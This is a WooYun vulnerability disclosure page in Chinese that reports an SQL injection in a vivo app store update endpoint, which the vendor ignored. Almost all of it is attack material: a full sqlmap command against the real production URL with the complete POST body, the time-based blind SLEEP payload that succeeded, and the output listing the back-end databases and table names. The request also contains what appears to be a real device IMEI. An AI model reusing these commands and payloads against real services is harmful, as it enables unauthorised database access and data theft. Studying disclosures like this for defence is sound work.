乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-06: 细节已通知厂商并且等待厂商处理中 2016-04-11: 厂商已经主动忽略漏洞,细节向公众公开
。。忽略
python sqlmap.py -u "http://update.appstore.vivo.com.cn/port/packages_update/" --data "nt=WIFI&model=vivo+X5Max%2B&packages=com.tencent.mm%7C760%7C%2Ccom.vlife.vivo.wallpaper%7C559%7C%2Ccn.wps.moffice_eng%7C149%7C%2Cnet.openvpn.openvpn%7C74%7C%2Ccom.naver.linewebtoon%7C151101%7C%2Ccom.qiyi.video%7C88%7C%2Ccom.baidu.BaiduMap%7C740%7C%2Ccom.dmm.games.touken%7C32%7C%2Ccom.baidu.appsearch%7C16787600%7C%2Ccom.easyovpn.easyovpn%7C150827263%7C%2Ccom.tudou.android%7C65%7C%2Ccom.windfindtech.ishanghai%7C22%7C%2Ccom.tencent.mobileqq%7C348%7C%2Ccom.huati%7C20141238%7C%2Ccom.google.android.syncadapters.calendar%7C16%7C%2Ccom.sankuai.meituan%7C361%7C%2Ckvpioneer.safecenter%7C6%7C%2Ccom.taobao.taobao%7C131%7C%2Ccom.bbk.appstore%7C622%7C%2Ccom.vivo.game%7C38%7C%2Ccom.vivo.browser%7C4420%7C%2Ccom.android.browser%7C59999%7C%2Ccom.chaozh.iReader%7C431%7C%2Ccom.vivo.space%7C13%7C&density=3.0&screensize=1080_1920&imei=867404020999500&at=1459861062590&n=2&app_version=622&av=19&cs=0&u=-323977978&pictype=webp&elapsedtime=125452006&an=4.4.4&dbversion=0&s=2%7C4273816697"
---Parameter: an (POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: nt=WIFI&model=vivo X5Max+&packages=com.tencent.mm|760|,com.vlife.vivo.wallpaper|559|,cn.wps.moffice_eng|149|,net.openvpn.openvpn|74|,com.naver.linewebtoon|151101|,com.qiyi.video|88|,com.baidu.BaiduMap|740|,com.dmm.games.touken|32|,com.baidu.appsearch|16787600|,com.easyovpn.easyovpn|150827263|,com.tudou.android|65|,com.windfindtech.ishanghai|22|,com.tencent.mobileqq|348|,com.huati|20141238|,com.google.android.syncadapters.calendar|16|,com.sankuai.meituan|361|,kvpioneer.safecenter|6|,com.taobao.taobao|131|,com.bbk.appstore|622|,com.vivo.game|38|,com.vivo.browser|4420|,com.android.browser|59999|,com.chaozh.iReader|431|,com.vivo.space|13|&density=3.0&screensize=1080_1920&imei=867404020999500&at=1459861062590&n=2&app_version=622&av=19&cs=0&u=-323977978&pictype=webp&elapsedtime=125452006&an=4.4.4' AND (SELECT * FROM (SELECT(SLEEP(5)))ghSA) AND 'LGGj'='LGGj&dbversion=0&s=2|4273816697---back-end DBMS: MySQL 5.0.12available databases [3]:[*] appcontent[*] information_schema[*] test
Database: appcontent[23 tables]+-----------------------------+| :ec_manual_catch_apk || comment_tmp || t_ac_apk_url || t_ac_app_info || t_ac_app_info_all || t_ac_app_info_hot || t_ac_app_s || t_ac_app_screenshot || t_ac_fail_catch_app || t_ac_manual_update_apk || t_ac_single_download || t_ac_spider_detail_q || t_ac_spider_detail_template || t_ac_spider_list_task || t_ac_spider_list_template || t_ac_wdj_icon || t_activity_info || t_ad_app || t_ad_click || t_ad_icon || t_ad_info || t_android_permission || t_apk_delete |+-----------------------------+
危害等级:无影响厂商忽略
忽略时间:2016-04-11 19:20
漏洞Rank:15 (WooYun评价)
暂无